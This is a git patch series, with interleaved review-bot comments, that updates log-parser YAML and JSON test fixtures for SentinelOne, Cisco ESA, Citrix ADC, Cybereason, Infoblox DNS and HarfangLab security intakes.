"{\"tgt.process.displayName\":\"curl\",\"event.category\":\"process\",\"site.id\":\"1967302198659758782\",\"tgt.process.pid\":30273,\"endpoint.os\":\"osx\",\"tgt.process.name\":\"curl\",\"tgt.process.storyline.id\":\"EE9FB66D-9B03-4286-971C-7A20615D157B\",\"tgt.process.signedStatus\":\"signed\",\"tgt.process.isNative64Bit\":false,\"mgmt.id\":\"16205\",\"os.name\":\"OS X\",\"tgt.process.cmdline\":\"curl -H User-Agent: test.nvim v1.10.0 (+https:\\/\\/test.test\\/tttttttt\\/test.nvim) -fsSL -X GET -o \\/Users\\/test.user\\/.local\\/share\\/nvim\\/test\\/registries\\/github\\/test-org\\/test-registry\\/registry.json.zip --connect-timeout 30 
https:\\/\\/test.test\\/test-org\\/test-registry\\/releases\\/download\\/2024-12-05-doting-coil\\/registry.json.zip\",\"i.version\":\"preprocess-lib-1.0\",\"process.unique.key\":\"54EDFDFD-139E-4040-A961-59D6F9C33F63\",\"tgt.process.uid\":\"54EDFDFD-139E-4040-A961-59D6F9C33F63\",\"tgt.process.isStorylineRoot\":false,\"mgmt.url\":\"mgm-testing-test.sentinelone.net\",\"agent.version\":\"23.3.1.7037\",\"tgt.process.subsystem\":\"SUBSYSTEM_UNKNOWN\",\"tgt.process.image.sha256\":\"8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42\",\"mgmt.osRevision\":\"14.7.1 (23H222)\",\"meta.event.name\":\"PROCESSCREATION\",\"group.id\":\"EE9FB66D-9B03-4286-971C-7A20615D157B\",\"tgt.process.publisher\":\"\",\"tgt.process.startTime\":1733386731479,\"tgt.process.verifiedStatus\":\"verified\",\"endpoint.type\":\"laptop\",\"tgt.process.image.path\":\"\\/usr\\/bin\\/curl\",\"i.scheme\":\"edr\",\"trace.id\":\"XXXXXXX-XXXXXXXX-XXXXXXX\",\"tgt.process.integrityLevel\":\"INTEGRITY_LEVEL_UNKNOWN\",\"site.name\":\"LEDGER\",\"agent.uuid\":\"xxxx-XXXXXX-XXXXx-xxxxx\",\"tgt.process.image.md5\":\"fe61928bbd84ed16fc4f934307bf2f16\",\"event.time\":1733386731479,\"tgt.process.user\":\"test.user\",\"timestamp\":\"2024-12-05T08:18:51.479Z\",\"account.id\":\"1967302197074311859\",\"dataSource.name\":\"SentinelOne\",\"endpoint.name\":\"LMFR0205\",\"packet.id\":\"949E7E9F-F1E6-4507-830F-E272AAED8F15\",\"tgt.process.sessionId\":0,\"dataSource.vendor\":\"SentinelOne\",\"dataSource.category\":\"security\",\"tgt.process.isRedirectCmdProcessor\":false,\"tgt.process.image.sha1\":\"e817c506298dc8a2dba727562b6efc60dcf4db1a\",\"account.name\":\"24 - LEDGER\",\"event.type\":\"Process Creation\",\"event.id\":\"XXXXXXX-XXXXXXXX-XXXXXXX_77\"}", + "event": { + "action": "Process Creation", + "category": [ + "process" + ], + "dataset": "cloud-funnel-2.0", + "type": [ + "info" + ] + }, + "@timestamp": "2024-12-05T08:18:51.479000Z", + "agent": { + "version": "23.3.1.7037" + }, + "deepvisibility": { + 
"agent": { + "managment_url": "mgm-testing-test.sentinelone.net", + "trace_id": "XXXXXXX-XXXXXXXX-XXXXXXX", + "uuid": "xxxx-XXXXXX-XXXXx-xxxxx" + }, + "event": { + "category": "process", + "type": "Process Creation" + }, + "host": { + "os": { + "revision": "14.7.1 (23H222)" + } + }, + "process": { + "target": { + "command_line": "curl -H User-Agent: test.nvim v1.10.0 (+https://test.test/tttttttt/test.nvim) -fsSL -X GET -o /Users/test.user/.local/share/nvim/test/registries/github/test-org/test-registry/registry.json.zip --connect-timeout 30 https://test.test/test-org/test-registry/releases/download/2024-12-05-doting-coil/registry.json.zip", + "executable": "/usr/bin/curl", + "hash": { + "md5": "fe61928bbd84ed16fc4f934307bf2f16", + "sha1": "e817c506298dc8a2dba727562b6efc60dcf4db1a", + "sha256": "8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42" + }, + "name": "curl", + "storyline_id": "EE9FB66D-9B03-4286-971C-7A20615D157B", + "title": "curl", + "working_directory": "/usr/bin" + } + } + }, + "host": { + "name": "LMFR0205", + "os": { + "family": "osx", + "name": "OS X" + }, + "type": "laptop" + }, + "observer": { + "vendor": "SentinelOne" + }, + "process": { + "command_line": "curl -H User-Agent: test.nvim v1.10.0 (+https://test.test/tttttttt/test.nvim) -fsSL -X GET -o /Users/test.user/.local/share/nvim/test/registries/github/test-org/test-registry/registry.json.zip --connect-timeout 30 https://test.test/test-org/test-registry/releases/download/2024-12-05-doting-coil/registry.json.zip", + "executable": "/usr/bin/curl", + "hash": { + "md5": "fe61928bbd84ed16fc4f934307bf2f16", + "sha1": "e817c506298dc8a2dba727562b6efc60dcf4db1a", + "sha256": "8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42" + }, + "name": "curl", + "pid": 30273, + "start": "2024-12-05T08:18:51.479000Z", + "title": "curl", + "user": { + "name": "test.user" + }, + "working_directory": "/usr/bin" + }, + "related": { + "hash": [ + 
"8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42", + "e817c506298dc8a2dba727562b6efc60dcf4db1a", + "fe61928bbd84ed16fc4f934307bf2f16" + ] + }, + "url": { + "domain": "test.test", + "original": "https://test.test/test-org/test-registry/releases/download/2024-12-05-doting-coil/registry.json.zip", + "path": "/test-org/test-registry/releases/download/2024-12-05-doting-coil/registry.json.zip", + "port": 443, + "scheme": "https", + "subdomain": "test" + } + } +} \ No newline at end of file From 1757251807a7b82dbfcc0a5a1564263567755787 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 10 Dec 2024 15:27:28 +0100 Subject: [PATCH 135/150] fix on fields --- Cisco/cisco-esa/_meta/fields.yml | 12 ++++----- .../tests/test_attachments_details.json | 18 ++++++------- Cisco/cisco-esa/tests/test_ingest_log2.json | 18 ++++++------- Cisco/cisco-esa/tests/test_ingest_log5.json | 26 +++++++++---------- Cisco/cisco-esa/tests/test_ingest_log7.json | 6 ++--- 5 files changed, 36 insertions(+), 44 deletions(-) diff --git a/Cisco/cisco-esa/_meta/fields.yml b/Cisco/cisco-esa/_meta/fields.yml index 8adc31e3c..3ea23bd6f 100644 --- a/Cisco/cisco-esa/_meta/fields.yml +++ b/Cisco/cisco-esa/_meta/fields.yml @@ -116,14 +116,14 @@ cisco.esa.status: name: cisco.esa.status type: keyword -cisco.esa.url.domain: - description: the declaration of the cisco urls domains - name: cisco.esa.url.domain +cisco.esa.url: + description: the declaration of the cisco urls + name: cisco.esa.url type: keyword -cisco.esa.url.full: - description: the declaration of the cisco urls - name: cisco.esa.url.full +cisco.esa.url_domain: + description: '' + name: cisco.esa.url_domain type: keyword email.attachments: diff --git a/Cisco/cisco-esa/tests/test_attachments_details.json b/Cisco/cisco-esa/tests/test_attachments_details.json index d6a1e2d56..ce0d1d1b3 100644 --- a/Cisco/cisco-esa/tests/test_attachments_details.json +++ b/Cisco/cisco-esa/tests/test_attachments_details.json 
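Review bot: `cisco.esa.url_domain` is added with `description: ''`, dropping the wording the removed `cisco.esa.url.domain` entry carried. Restore it, e.g. `description: the domains of the URLs found in the message` (or reuse the old `the declaration of the cisco urls domains`), since an empty description is what ends up in the generated field reference. The `harfanglab.agent_ids` entry in the HarfangLab fields.yml hunk later in this series has the same empty description and should get one as well, e.g. `description: identifiers of the agents associated with the event`.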
@@ -55,16 +55,14 @@ "age": "30 days (or greater)" } }, - "url": { - "domain": [ - "schemas.microsoft.com", - "www.w3.org" - ], - "full": [ - "http://schemas.microsoft.com/office/2004/12/omml", - "http://www.w3.org/TR/REC-html40" - ] - } + "url": [ + "http://schemas.microsoft.com/office/2004/12/omml", + "http://www.w3.org/TR/REC-html40" + ], + "url_domain": [ + "schemas.microsoft.com", + "www.w3.org" + ] } }, "email": { diff --git a/Cisco/cisco-esa/tests/test_ingest_log2.json b/Cisco/cisco-esa/tests/test_ingest_log2.json index 861934a97..4dbc8fa48 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log2.json +++ b/Cisco/cisco-esa/tests/test_ingest_log2.json @@ -58,16 +58,14 @@ "age": "9 years 3 months 14 days" } }, - "url": { - "domain": [ - "bce-demo.appc.cisco.com", - "mandrill.appc.cisco.com" - ], - "full": [ - "http://mandrill.appc.cisco.com/track/open.php?u=30372747&id=d57275a6c9df40418a90fd977e3bf506", - "https://bce-demo.appc.cisco.com/sensors/a7b04388-0f6e-11e9-8def-0242ac110002" - ] - } + "url": [ + "http://mandrill.appc.cisco.com/track/open.php?u=30372747&id=d57275a6c9df40418a90fd977e3bf506", + "https://bce-demo.appc.cisco.com/sensors/a7b04388-0f6e-11e9-8def-0242ac110002" + ], + "url_domain": [ + "bce-demo.appc.cisco.com", + "mandrill.appc.cisco.com" + ] } }, "email": { diff --git a/Cisco/cisco-esa/tests/test_ingest_log5.json b/Cisco/cisco-esa/tests/test_ingest_log5.json index 77ae37f04..6bc9470fd 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log5.json +++ b/Cisco/cisco-esa/tests/test_ingest_log5.json 
@@ -52,20 +52,18 @@ "age": "30 days (or greater)" } }, - "url": { - "domain": [ - "", - "facebook.com", - "tiktok.com", - "tinyurl.es" - ], - "full": [ - "https://facebook.com/u/john.doe", - "https://tiktok.com", - "https://tinyurl.es/tbdra", - "www.twitter.com" - ] - } + "url": [ + "https://facebook.com/u/john.doe", + "https://tiktok.com", + "https://tinyurl.es/tbdra", + "www.twitter.com" + ], + "url_domain": [ + "", + "facebook.com", + "tiktok.com", + "tinyurl.es" + ] } }, "email": { diff --git a/Cisco/cisco-esa/tests/test_ingest_log7.json b/Cisco/cisco-esa/tests/test_ingest_log7.json index 8fcb871ab..45d8465a7 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log7.json +++ b/Cisco/cisco-esa/tests/test_ingest_log7.json @@ -55,10 +55,8 @@ "age": "30 days (or greater)" } }, - "url": { - "domain": [], - "full": [] - } + "url": [], + "url_domain": [] } }, "email": { From cd6d9306d07e6c410c9db83fbb4e529e895f59db Mon Sep 17 00:00:00 2001 From: vg-svitla Date: Tue, 10 Dec 2024 16:28:27 +0200 Subject: [PATCH 136/150] Fix: Citrix ADC fix warning --- Citrix/citrix-adc/ingest/parser.yml | 8 ++++++-- Citrix/citrix-adc/tests/test_aaatm.json | 20 ++++++-------------- 2 files changed, 12 insertions(+), 16 deletions(-) diff --git a/Citrix/citrix-adc/ingest/parser.yml b/Citrix/citrix-adc/ingest/parser.yml index 9c6c377a7..6fead398e 100644 --- a/Citrix/citrix-adc/ingest/parser.yml +++ b/Citrix/citrix-adc/ingest/parser.yml @@ -90,7 +90,7 @@ pipeline: CIPHER_SUITE: '"?"?[\w\-\.]+"?"?' - name: set_audit_log_fields - filter: '{{not original.message.startswith("CEF")}}' + filter: '{{not original.message.startswith("CEF") and parse_audit_header.message.type not in ["AAATM"]}}' - name: set_connection_log_fields filter: "{{ parse_audit_header.message.type == 'TCP' }}" 
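Review bot: Adding `parse_audit_header.message.type not in ["AAATM"]` to the `set_audit_log_fields` filter (and `'AAATM'` to the `set_other_log_fields` exclusion in the hunk at -105) means AAATM messages now produce no fields at all: the updated test_aaatm.json asserts only the `No fields extracted from original event` warning where it previously asserted `@timestamp`, `event.dataset: audit_aaatm`, `event.code` and `event.reason`. AAATM covers the AAA (authentication) traffic-management module, so this trades one parsing warning for the loss of timestamps and reasons on authentication-related events, a visibility regression for anyone alerting on them. If the warning comes from this particular JSON-parser debug line rather than from AAATM as a type, a narrower filter on the message content, or keeping `set_audit_log_fields` for AAATM and excluding it only from `set_other_log_fields`, would be safer. Both hunks change a single `filter:` line inside `pipeline:`, which begins before the first of them.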
@@ -105,7 +105,7 @@ pipeline: filter: "{{ parse_audit_header.message.type == 'SSLLOG' }}" - name: set_other_log_fields - filter: "{{ parse_audit_header.message.type not in ['SSLVPN', 'SSLLOG', 'TCP'] }}" + filter: "{{ parse_audit_header.message.type not in ['SSLVPN', 'SSLLOG', 'TCP', 'AAATM'] }}" stages: set_cef_header_fields: @@ -113,17 +113,21 @@ stages: - set: event.kind: "alert" event.dataset: "alert" + - set: observer.vendor: "{{parsed_event.message.DeviceVendor}}" observer.product: "{{parsed_event.message.DeviceProduct}}" observer.version: "{{parsed_event.message.DeviceVersion}}" + - set: source.ip: "{{parsed_event.message.src}}" source.port: "{{parsed_event.message.spt}}" + - set: event.reason: "{{parsed_event.message.msg}}" event.action: "{{parsed_event.message.act}}" event.category: ["network"] + - set: url.original: "{{parsed_event.message.request}}" - set: diff --git a/Citrix/citrix-adc/tests/test_aaatm.json b/Citrix/citrix-adc/tests/test_aaatm.json index 8db673e24..abc914658 100644 --- a/Citrix/citrix-adc/tests/test_aaatm.json +++ b/Citrix/citrix-adc/tests/test_aaatm.json @@ -4,20 +4,12 @@ }, "expected": { "message": "09/29/2023:07:40:56 GMT ADC 0-PPE-1 : default AAATM Message 1111111111 0 : \"AAA JSON-PARSE: ns_aaa_json_parser_StartElementHandler: NAME_VAL state, multi valued attribute start 'ConnectionId' seen\"", - "event": { - "category": [ - "network" - ], - "code": "Message", - "dataset": "audit_aaatm", - "reason": "\"AAA JSON-PARSE: ns_aaa_json_parser_StartElementHandler: NAME_VAL state, multi valued attribute start 'ConnectionId' seen\"", - "type": [ - "connection" - ] - }, - "@timestamp": "2023-09-29T07:40:56Z", - "observer": { - "name": "ADC" + "sekoiaio": { + "intake": { + "parsing_warnings": [ + "No fields extracted from original event" + ] + } } } } \ No newline at end of file From 28a6c8731ba8f8e122ded925ba64d37958d6c52e Mon Sep 17 00:00:00 2001 
From: vg-svitla Date: Tue, 10 Dec 2024 16:30:51 +0200 Subject: [PATCH 137/150] Fix: Extract more fields for Cybereason --- CybeReason/malop-json/ingest/parser.yml | 33 +++++++++++++++++++ CybeReason/malop-json/tests/test_malop.json | 26 ++++++++++++++- .../malop-json/tests/test_malop_detail.json | 25 +++++++++++++- 3 files changed, 82 insertions(+), 2 deletions(-) diff --git a/CybeReason/malop-json/ingest/parser.yml b/CybeReason/malop-json/ingest/parser.yml index 80803a753..9f716126d 100644 --- a/CybeReason/malop-json/ingest/parser.yml +++ b/CybeReason/malop-json/ingest/parser.yml 
@@ -61,19 +61,43 @@ stages: - set: observer.vendor: "Cybereason" observer.product: "Cybereason" + handle_malop: actions: - set: "@timestamp": "{{parsed_timestamp.datetime}}" filter: "{{parsed_event.message.lastUpdateTime != null}}" + - set: file.name: "{{parsed_event.message.primaryRootCauseName}}" file.hash.sha1: "{{parsed_event.message.rootCauseElementHashes}}" filter: '{{parsed_event.message.rootCauseElementType == "File"}}' + - set: process.name: "{{parsed_event.message.primaryRootCauseName}}" process.hash.sha1: "{{parsed_event.message.rootCauseElementHashes}}" filter: '{{parsed_event.message.rootCauseElementType == "Process"}}' + + - set: + host.os.type: "{{parsed_event.message.machines[0].get('osType', '').lower()}}" + host.name: "{{parsed_event.message.machines[0].get('displayName')}}" + host.domain: "{{parsed_event.message.machines[0].get('adDNSHostName')}}" + cybereason.malop.host.id: "{{parsed_event.message.machines[0].get('guid')}}" + cybereason.malop.host.is_online: "{{parsed_event.message.machines[0].get('connected')}}" + cybereason.malop.host.is_isolated: "{{parsed_event.message.machines[0].get('isolated')}}" + filter: "{{parsed_event.message.get('machines', []) != []}}" + + - set: + user.name: "{{parsed_event.message.users[0].get('displayName')}}" + cybereason.malop.user.id: "{{parsed_event.message.users[0].get('guid')}}" + cybereason.malop.user.is_admin: "{{parsed_event.message.users[0].get('admin')}}" + filter: "{{parsed_event.message.get('users', []) != []}}" + + - set: + user.name: '{{parsed_event.message.users[0].displayName.split("\\")[1]}}' + user.domain: '{{parsed_event.message.users[0].displayName.split("\\")[0]}}' + filter: '{{parsed_event.message.get("users", []) != [] and "\\" in parsed_event.message.users[0].get("displayName")}}' + - set: event.kind: "alert" event.category: ["malware"] 
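Review bot: The new `host.os.type` line calls `.lower()` on `machines[0].get('osType', '')`, but the default only covers a missing key — a key present with a JSON null returns `None`, so a null `osType` breaks the whole `set` action, while `handle_machine_model` later in the file guards the same call with `osType != null`. Use `host.os.type: "{{(parsed_event.message.machines[0].get('osType') or '').lower()}}"`, and harden the last filter the same way, `'{{... and "\\" in (parsed_event.message.users[0].get("displayName") or "")}}'`, since `in None` raises for a null display name. Only `machines[0]` and `users[0]` are read, so a Malop spanning several hosts or users loses all but the first; if that is intended, a short comment saying so would help the next maintainer. Unrelated to this hunk's additions, the context of the whitespace-only hunk at -88 shows `cybereason.malop.created_at` filtered on `malopCloseTime != null` and `modified_at` on `creationTime != null`, which look swapped. `handle_malop` continues past the end of this hunk.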
@@ -88,22 +112,28 @@ stages: cybereason.malop.root_cause.type: "{{parsed_event.message.rootCauseElementType}}" cybereason.malop.root_cause.name: "{{parsed_event.message.primaryRootCauseName}}" cybereason.malop.is_edr: "{{parsed_event.message.edr}}" + - set: cybereason.malop.created_at: "{{parsed_creation_time.datetime}}" filter: "{{parsed_event.message.malopCloseTime != null}}" + - set: cybereason.malop.modified_at: "{{parsed_timestamp.datetime}}" filter: "{{parsed_event.message.creationTime != null}}" + - set: cybereason.malop.closed_at: "{{parsed_closing_time.datetime}}" filter: "{{parsed_event.message.malopCloseTime != null}}" + handle_model: actions: - set: "@timestamp": "{{parsed_timestamp.datetime}}" filter: "{{parsed_event.message.metadata.timestamp != null}}" + - set: cybereason.malop.id: "{{parsed_event.message.metadata.malopGuid}}" + handle_machine_model: actions: - set: @@ -118,6 +148,7 @@ stages: - set: host.os.type: "{{parsed_event.message.osType.lower()}}" filter: "{{parsed_event.message.osType != null}}" + handle_user_model: actions: - set: @@ -127,10 +158,12 @@ stages: user.name: "{{parsed_event.message.displayName}}" cybereason.malop.user.id: "{{parsed_event.message.guid}}" cybereason.malop.user.is_admin: "{{parsed_event.message.admin}}" + - set: user.name: '{{parsed_event.message.displayName.split("\\")[1]}}' user.domain: '{{parsed_event.message.displayName.split("\\")[0]}}' filter: '{{parsed_event.message.displayName != null and "\\" in parsed_event.message.displayName}}' + handle_file_suspect_model: actions: - set: diff --git a/CybeReason/malop-json/tests/test_malop.json b/CybeReason/malop-json/tests/test_malop.json index b7ad07bb9..a5df9c14f 100644 --- a/CybeReason/malop-json/tests/test_malop.json +++ b/CybeReason/malop-json/tests/test_malop.json 
@@ -24,6 +24,11 @@ ], "type": "CUSTOM_RULE" }, + "host": { + "id": "-576002811.1198775089551518743", + "is_isolated": false, + "is_online": true + }, "id": "11.-6654920844431693523", "is_edr": "true", "modified_at": "2022-11-20T12:02:17.625000Z", @@ -33,7 +38,17 @@ "type": "Process" }, "severity": "High", - "status": "Active" + "status": "Active", + "user": { + "id": "0.2548072792133848559", + "is_admin": true + } + } + }, + "host": { + "name": "win-cybereason", + "os": { + "type": "windows" } }, "observer": { @@ -42,6 +57,15 @@ }, "process": { "name": "cymulateagent.exe" + }, + "related": { + "user": [ + "administrator" + ] + }, + "user": { + "domain": "win-cybereason", + "name": "administrator" } } } \ No newline at end of file diff --git a/CybeReason/malop-json/tests/test_malop_detail.json b/CybeReason/malop-json/tests/test_malop_detail.json index a009d865f..532ff8e73 100644 --- a/CybeReason/malop-json/tests/test_malop_detail.json +++ b/CybeReason/malop-json/tests/test_malop_detail.json @@ -24,6 +24,11 @@ ], "type": "KNOWN_MALWARE" }, + "host": { + "id": "-576002811.1198775089551518743", + "is_isolated": false, + "is_online": false + }, "id": "11.7498520112250262440", "is_edr": "false", "modified_at": "2022-11-14T02:19:45.000000Z", @@ -33,7 +38,11 @@ "type": "File" }, "severity": "Low", - "status": "Closed" + "status": "Closed", + "user": { + "id": "0.2548072792133848559", + "is_admin": false + } } }, "file": { @@ -42,6 +51,13 @@ }, "name": "kprocesshacker.sys" }, + "host": { + "domain": "desktop-aaaaaa.example.org", + "name": "desktop-aaaaaa", + "os": { + "type": "windows" + } + }, "observer": { "product": "Cybereason", "vendor": "Cybereason" @@ -49,7 +65,14 @@ "related": { "hash": [ "adc83b19e793491b1c6ea0fd8b46cd9f32e592fc" + ], + "user": [ + "system" ] + }, + "user": { + "domain": "desktop-aaaaa", + "name": "system" } } } \ No newline at end of file From a4754df9ef5b6fadafade5360e39be9c88359dab Mon Sep 17 00:00:00 2001 
From: vg-svitla Date: Tue, 10 Dec 2024 17:42:47 +0200 Subject: [PATCH 138/150] Fix comments --- Infoblox/ddi/ingest/parser.yml | 7 ++- Infoblox/ddi/tests/query_log_dns_5.json | 2 +- Infoblox/ddi/tests/query_log_dns_6.json | 2 +- Infoblox/ddi/tests/query_log_dns_7.json | 79 +++++++++++++++++++++++++ 4 files changed, 86 insertions(+), 4 deletions(-) diff --git a/Infoblox/ddi/ingest/parser.yml b/Infoblox/ddi/ingest/parser.yml index 0fd9855e8..c84be32fe 100644 --- a/Infoblox/ddi/ingest/parser.yml +++ b/Infoblox/ddi/ingest/parser.yml @@ -157,8 +157,11 @@ stages: - set: dns.answers: | [ - {%- for record in parse_event.message.dns_records.split() | batch(5) -%} - {"name": "{{record[0]}}", "ttl": {{record[1]}}, "class": "{{record[2]}}", "type": "{{record[3]}}", "data": "{{record[4][:-1]}}"}, + {%- for data in parse_event.message.dns_records.split(';') -%} + {%- if data != "" -%} + {%- set record = data.split(' ') -%} + {"name": "{{record[-5]}}", "ttl": {{record[-4]}}, "class": "{{record[-3]}}", "type": "{{record[-2]}}", "data": "{{record[-1]}}"}, + {%- endif -%} {%- endfor -%} ] filter: "{{parse_event.message.get('dns_records') != None}}" diff --git a/Infoblox/ddi/tests/query_log_dns_5.json b/Infoblox/ddi/tests/query_log_dns_5.json index 126d59135..e8b9350f6 100644 --- a/Infoblox/ddi/tests/query_log_dns_5.json +++ b/Infoblox/ddi/tests/query_log_dns_5.json @@ -8,7 +8,7 @@ "answers": [ { "class": "IN", - "data": "test.test.io", + "data": "test.test.io.", "name": "test.test.io.", "ttl": 86400, "type": "CNAME" diff --git a/Infoblox/ddi/tests/query_log_dns_6.json b/Infoblox/ddi/tests/query_log_dns_6.json index 606b02ef2..c3e9d8ddc 100644 --- a/Infoblox/ddi/tests/query_log_dns_6.json +++ b/Infoblox/ddi/tests/query_log_dns_6.json @@ -43,7 +43,7 @@ }, { "class": "IN", - "data": "192.168.1.", + "data": "192.168.1.1", "name": "test.test.org.", "ttl": 365, "type": "A" 
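Review bot: The new loop skips only chunks equal to `""`, but `data.split(' ')` keeps empty tokens, so a chunk that is whitespace-only (a trailing `; ` after the last record) or a record with doubled spaces either trips the `record[-5]` index or shifts every field; `{%- if data.strip() != "" -%}` together with `{%- set record = data.split() -%}` collapses runs of spaces and keeps the negative indices on the right tokens, which is exactly what the new fixture relies on for names that were line-wrapped in the source (`thmwh.l46l2i c8.c3r2fb7...` → `c8.c3r2fb7...`). The object is still built by string interpolation: `"data": "{{record[-1]}}"` takes only the last token and is not escaped, so a TXT or similar record whose data contains spaces or a `"` would be truncated or make `dns.answers` unparseable; if such records can reach this intake, building the list and emitting it with Jinja's `tojson` (if the template environment exposes it) would be more robust than hand-written JSON. The unquoted `{{record[-4]}}` for `ttl` has the same fragility for a non-numeric token.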
diff --git a/Infoblox/ddi/tests/query_log_dns_7.json b/Infoblox/ddi/tests/query_log_dns_7.json index ca3673036..7e8b80b01 100644 --- a/Infoblox/ddi/tests/query_log_dns_7.json +++ b/Infoblox/ddi/tests/query_log_dns_7.json 
@@ -5,6 +5,85 @@ "expected": { "message": "client 192.168.1.1#49943: UDP: query: test.dev IN A response: NOERROR + test.dev. 11720 IN CNAME test.dev.; thmwh.l46l2i c8.c3r2fb7.81hxxxxxx.dev. 67 IN CNAME test.dev.; test.dev. 52 IN CNAME test.dev.; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; th mwh.xxxxxxxx.c3r2fb7.81hxxxxxx.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; thmwh.xxxxxxxx.c3r2fb7.81h xxxxxx.dev. 235 IN A 192.168.1.1;", "dns": { + "answers": [ + { + "class": "IN", + "data": "test.dev.", + "name": "test.dev.", + "ttl": 11720, + "type": "CNAME" + }, + { + "class": "IN", + "data": "test.dev.", + "name": "c8.c3r2fb7.81hxxxxxx.dev.", + "ttl": 67, + "type": "CNAME" + }, + { + "class": "IN", + "data": "test.dev.", + "name": "test.dev.", + "ttl": 52, + "type": "CNAME" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "mwh.xxxxxxxx.c3r2fb7.81hxxxxxx.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "xxxxxx.dev.", + "ttl": 235, + "type": "A" + } + ], "header_flags": [], "question": { "class": "IN", From 061e9656533eac6955dba9be73a10123daef8bdc Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?L=C3=A9na=C3=AFg?= <126670263+LenaigKaliou@users.noreply.github.com> Date: Tue, 10 Dec 2024 16:50:08 +0100 Subject: [PATCH 139/150] Update HarfangLab/harfanglab/ingest/parser.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- HarfangLab/harfanglab/ingest/parser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 96338037d..c09e780c2 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml @@ -143,7 +143,7 @@ stages: url.original: "{{json_event.message.details_url_request.url}}" - set: - agent.id: "{{json_event.message.agents[0].agent_id}}" + harfanglab.agent_ids: "{{json_event.message.agents | map(attribute='agent_id') | list}" filter: "{{json_event.message.agents | length > 0}}" network_info: From cd0a5dc4c25145de4300b3c9fcfda65fd65dcbd3 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 10 Dec 2024 16:57:25 +0100 Subject: [PATCH 140/150] fixes on fields and typo --- HarfangLab/harfanglab/_meta/fields.yml | 5 +++++ HarfangLab/harfanglab/ingest/parser.yml | 2 +- HarfangLab/harfanglab/tests/threat_critical.json | 4 +++- HarfangLab/harfanglab/tests/threat_log.json | 5 ++++- 4 files changed, 13 insertions(+), 3 deletions(-) diff --git a/HarfangLab/harfanglab/_meta/fields.yml b/HarfangLab/harfanglab/_meta/fields.yml index 611f3c079..902363c55 100644 --- a/HarfangLab/harfanglab/_meta/fields.yml +++ b/HarfangLab/harfanglab/_meta/fields.yml @@ -953,6 +953,11 @@ action.properties.param9: name: action.properties.param9 type: keyword +harfanglab.agent_ids: + description: '' + name: harfanglab.agent_ids + type: keyword + harfanglab.aggregation_key: description: The key to the events aggregation name: harfanglab.aggregation_key 
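Review bot: The replacement removes the ECS `agent.id` field outright instead of adding `harfanglab.agent_ids` beside it, so any consumer keyed on `agent.id` (the fixtures in the following commit delete it from their expected output) stops matching, and neither this commit's diffstat nor the next one's touches the CHANGELOG. Keeping `agent.id: "{{json_event.message.agents[0].agent_id}}"` in the same `set` alongside the new list would make the change backward compatible, with the list documented as the multi-agent view. The enclosing `- set:` stage begins outside the hunk.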
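Review bot: `description: ''` on the new `harfanglab.agent_ids` entry leaves the field undocumented while its neighbours (`harfanglab.aggregation_key` directly below) all carry one. Something like `description: Identifiers of the agents associated with the event (one entry per agent)` would do, and since the value is rendered from the `agents` array as a list, stating that it is multi-valued tells users how to query it.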
diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index c09e780c2..34535641b 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml @@ -143,7 +143,7 @@ stages: url.original: "{{json_event.message.details_url_request.url}}" - set: - harfanglab.agent_ids: "{{json_event.message.agents | map(attribute='agent_id') | list}" + harfanglab.agent_ids: "{{json_event.message.agents | map(attribute='agent_id') | list}}" filter: "{{json_event.message.agents | length > 0}}" network_info: diff --git a/HarfangLab/harfanglab/tests/threat_critical.json b/HarfangLab/harfanglab/tests/threat_critical.json index e9b50e3db..ce1d2faa4 100644 --- a/HarfangLab/harfanglab/tests/threat_critical.json +++ b/HarfangLab/harfanglab/tests/threat_critical.json @@ -10,10 +10,12 @@ "start": "2024-03-19T09:21:00Z" }, "agent": { - "id": "af5e2f63-becd-4660-ade8-30d04c0dd044", "name": "harfanglab" }, "harfanglab": { + "agent_ids": [ + "af5e2f63-becd-4660-ade8-30d04c0dd044" + ], "count": { "rules": 1, "users_impacted": 0 diff --git a/HarfangLab/harfanglab/tests/threat_log.json b/HarfangLab/harfanglab/tests/threat_log.json index 233ffd066..bed91707b 100644 --- a/HarfangLab/harfanglab/tests/threat_log.json +++ b/HarfangLab/harfanglab/tests/threat_log.json @@ -10,10 +10,13 @@ "start": "2024-02-07T15:18:00Z" }, "agent": { - "id": "215fe295-905f-4a8d-8347-e9d438d4e415", "name": "harfanglab" }, "harfanglab": { + "agent_ids": [ + 